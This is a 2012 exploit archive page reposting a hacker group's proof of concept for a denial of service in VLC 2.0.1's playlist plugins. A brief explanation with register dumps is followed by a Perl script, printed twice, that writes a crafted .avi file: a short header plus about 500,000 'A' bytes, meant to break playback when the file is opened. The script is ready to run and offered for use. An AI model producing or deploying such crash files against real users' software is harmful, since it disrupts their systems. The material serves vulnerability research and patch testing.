what you don't know can hurt you

VLC 2.0.1 Denial Of Service

VLC 2.0.1 Denial Of Service
Posted Jun 28, 2012
Authored by Dark-Puzzle

VLC version 2.0.1 suffers from an avi playlist denial of service vulnerability.

tags | exploit, denial of service
MD5 | 7c5394441db0457d05007182d4a8f849

VLC 2.0.1 Denial Of Service

Change Mirror Download
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
0 1
1 dark-puzzle[at]live[at]fr 0
0 ========================================== 1
1 Pentesting/exploit coding/bug research 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
[0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]

# Exploit Title: VLC 2.0.1 - .avi playlist plugins DoS (Explanation + PoC) .
# Author: Dark-Puzzle .
# Danger : Medium .
# Category :Local Exploit .
# Version: Latest ; 2.0.1 And 2.0.1 Twoflower (Previous versions are not tested but Maybe Vulnerable)
# Vendor : www.videolan.org
# Software Link : http://www.videolan.org/vlc/releases/2.0.1.html (Latest Version)
# Date: 26 June 2012 .
---------------------------------------------------------------------------
Understanding the Exploit :

Executing a .avi file created with the script below causes a DoS of the Playlist Plugins , so the playlist stop running . Clicking to play another media in the playlist or trying to Play/Pause/Stop doesn't work anymore . So The program Should be restarted .

The issue is that the return adress to the plugins files in windows and VLC DLL in the stack (from 01EFF8BC to 01EFF9B8 [in my case] ) are facing a problem when filling ASCII + the hex code in the avi file .

Registers :

EAX 00000000
ECX 00000000
EDX 00000000
EBX 000005FA
ESP 01EFF8BC
EBP 01EFF8C0
ESI 01EFFB40
EDI 01475FF8
EIP 653FCF0F
----------------------------------------

LastErr ERROR_PATH_NOT_FOUND (00000003)

----------------------------------------

playlist plugin DLLs :

libmpc_plugin.dll
libsid_plugin.dll
libxa_plugin.dll ...

----------------------------------------

We can find some return adresses refering to the playlist in the stack after openning the .avi file .
So I've tried to create a file with a lib return adress with some nops and INT3's (not avalaible here) , and I've found that the DoS attack stops the playlist plugins from doing what they should do and making the program lose the playlist plugins paths even after loading them .As a result , you can't neither play any medias while the .avi file is in the playlist , nor play/pause/stop .

----------------------------------------
Exploitation ( PoC ) :

#!/usr/bin/perl
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;


my $file = "dark.avi";

open ($File, ">$file");
print $File $h,$d;
close ($File);



-----------------------------------------------------------------------------------------------


Dark-Puzzle (Souhail) .
\x90
Follow me : fb.me/dark.puzzle
\x90
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
\x90
Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
\x90
Pentesting is my LIFE .

GREY HAT Mercy From M0rocC0 .


my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;


my $file = "dark2.avi";

open ($File, ">$file");
print $File $h,$d;
close ($File);



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close